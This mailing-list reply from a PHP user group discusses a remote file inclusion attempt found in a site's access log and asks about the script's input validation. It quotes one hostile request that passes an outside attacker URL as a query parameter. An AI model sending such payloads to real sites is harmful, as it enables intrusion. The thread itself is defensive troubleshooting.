[nycphp-talk] Need suggestions on building a hacker trap...
David Krings
ramons at gmx.net
Tue Aug 12 06:58:11 EDT 2008
mikesz at qualityadvantages.com wrote:
> Hello NYPHP,
>
> I found the following attempted hack in the access log on one of my sites:
>
> "GET /index.php?Mode=http://badguyurl.ru/index.html?"
>
> In this case, the hacker didn't gain access to the site because a
> database script failed instead.
>
> I would like to be more proactive with trapping this and sending the
> results of the trap back to me so I can track and ban IP addresses
> etc.
>
> I have a procedure that I hacked for previous exploits but am
> interested now in other options that I may not have used previously.
So what exactly does the parameter Mode do? Isn't this line showing that a
parameter with value got passed to a script with GET? In that case, which
input validation / processing do your scripts have?
David
More information about the talk
mailing list